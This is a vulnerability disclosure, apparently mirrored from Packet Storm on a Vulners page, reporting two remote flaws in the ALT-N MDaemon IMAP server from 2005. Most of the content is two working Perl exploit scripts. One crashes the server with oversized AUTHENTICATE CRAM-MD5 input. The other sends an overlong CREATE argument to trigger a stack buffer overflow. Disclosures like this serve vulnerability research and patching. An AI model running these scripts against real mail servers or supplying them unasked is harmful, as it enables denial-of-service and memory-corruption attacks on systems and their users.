Lucene search
altn-mdaemon.txt
ποΈΒ 19 Jul 2005Β 00:00:00Reported byΒ KingcopeTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 13Β Views
Two remote vulnerabilities in ALT-N MDaemon imapd product including denial of service and stack-based buffer overflow, with sample exploits for AUTHENTICATE CRAM-MD5 and imap CREATE statement.
Show more
`Hello this is kcope,
there are two remote vulnerabilities in the latest ALT-N MDaemon imapd
product
i don't know if any of them is exploitable .. the stack based buffer
overflow
seems promising, but it's not preauth so i didn't investigate it further.
1.) Remote denial of service in AUTHENTICATE LOGIN and AUTHENTICATE CRAM-MD5
2.) Remote stack based buffer overflow after authentication in the imap
CREATE statement
---snip---
###
### MDAEMON remote DoS exploit by kcope
### looks like thereΒ΄s a fault in the base64 decoder
### works also for AUTHENTICATE LOGIN
###
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '143',
Proto => 'tcp');
$a = "q" x 1000;
print $sock "a001 AUTHENTICATE CRAM-MD5\r\n";
print $sock $a,"\r\n";
print $sock $a,"\r\n";
while (<$sock>) {
print $_;
}
---snip---
---snip---
### MDAEMON stack based buffer overflow
### Remote DoS exploit by kcope
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '143',
Proto => 'tcp');
$a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10;
print $sock "a001 LOGIN username password\r\n";
print $sock "a001 CREATE $a\r\n";
while (<$sock>) {
print $_;
}
---snip---
-kcope
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo19 Jul 2005 00:00Current
7.4High risk
Vulners AI Score7.4